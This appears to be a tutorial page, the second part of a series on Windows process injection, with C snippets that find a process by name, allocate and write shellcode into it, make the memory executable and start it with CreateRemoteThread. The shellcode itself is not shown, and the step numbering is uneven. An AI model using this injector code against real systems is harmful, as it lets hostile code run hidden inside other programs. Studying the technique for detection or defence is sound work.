Process Injection --Part 2--

1. Finding the Target Process ID

The function FindProcessID(const char *processName) is used to retrieve the Process ID (PID) of a running process by its name.

How it works:

It takes a snapshot of all running processes using CreateToolhelp32Snapshot().
It loops through the process list using Process32First() and Process32Next().
If it finds a process with a matching name (strcmp(pe32.szExeFile, processName) == 0), it returns the Process ID.

// Function to find process ID by name
DWORD FindProcessID(const char *processName) {
    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof(PROCESSENTRY32);

    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snapshot == INVALID_HANDLE_VALUE) {
        printf("Failed to take snapshot of processes. Error: %lu\n", GetLastError());
        return 0;
    }

    if (!Process32First(snapshot, &pe32)) {
        printf("Failed to get first process. Error: %lu\n", GetLastError());
        CloseHandle(snapshot);
        return 0;
    }

    do {
        if (strcmp(pe32.szExeFile, processName) == 0) {
            CloseHandle(snapshot);
            return pe32.th32ProcessID;
        }
    } while (Process32Next(snapshot, &pe32));

    CloseHandle(snapshot);
    return 0;
}

2. Defining the Shellcode

The unsigned char shellcode[] contains raw machine code (in hexadecimal format). This shellcode is executed inside the target process after being injected.

3. Allocating Memory in the Target Process

VirtualAllocEx() is called to allocate memory inside the target process.
The allocated memory has PAGE_READWRITE permissions for now.
If memory allocation fails, the program cleans up and exits.

    LPVOID allocated_mem = VirtualAllocEx(hProcess, NULL, shell_code_size , MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    if (!allocated_mem) {
        printf("[!] Memory allocation failed. Error: %lu\n", GetLastError());
        CloseHandle(hProcess);
        return -1;
    }
    printf("[+] Memory allocated at: 0x%p\n", allocated_mem);

3. Writing the Shellcode to the Allocated Memory

WriteProcessMemory() writes the shellcode to the allocated memory.
If writing fails, it frees the allocated memory and exits.

    // Write shellcode to allocated memory
    if (!WriteProcessMemory(hProcess, allocated_mem, shellcode, shell_code_size , NULL)) {
        printf("[!] Failed to write shellcode. Error: %lu\n", GetLastError());
        VirtualFreeEx(hProcess, allocated_mem, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        return -1;
    }

4. Changing Memory Permissions

VirtualProtectEx() changes the memory protection from PAGE_READWRITE to PAGE_EXECUTE_READ.
This allows the shellcode to be executed.

// Change memory protection to executable
    DWORD oldProtect;
    if (!VirtualProtectEx(hProcess, allocated_mem, shell_code_size, PAGE_EXECUTE_READ, &oldProtect)) {
        printf("[!] Failed to change memory protection. Error: %lu\n", GetLastError());
        VirtualFreeEx(hProcess, allocated_mem, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        return -1;
    }

5. Creating a Remote Thread

CreateRemoteThread() is used to create a new thread inside the target process.
The entry point for this thread is the allocated memory containing the shellcode.
If the function fails, the program cleans up and exits.

// Create a remote thread to execute shellcode
    HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)allocated_mem, NULL, 0, NULL);
    if (!hThread) {
        printf("[!] Failed to create remote thread. Error: %lu\n", GetLastError());
        VirtualFreeEx(hProcess, allocated_mem, 0, MEM_RELEASE);
        CloseHandle(hProcess);
        return -1;
    }

8. Waiting for the Shellcode Execution

WaitForSingleObject(hThread, INFINITE) waits for the shellcode execution to complete.
VirtualFreeEx() releases the allocated memory.
CloseHandle(hThread) and CloseHandle(hProcess) close the handles to prevent resource leaks.
A final message [+] We Are Do it <3 Happy Hack is printed.

// Wait for the shellcode to execute
    WaitForSingleObject(hThread, INFINITE);

    // Clean up
    VirtualFreeEx(hProcess, allocated_mem, 0, MEM_RELEASE);
    CloseHandle(hThread);
    CloseHandle(hProcess);
    printf("[+] We Are Do it <3 Happy Hack\n");

PreviousProcess Injection --Part 1--NextWeb Staging Payload

Last updated 11 months ago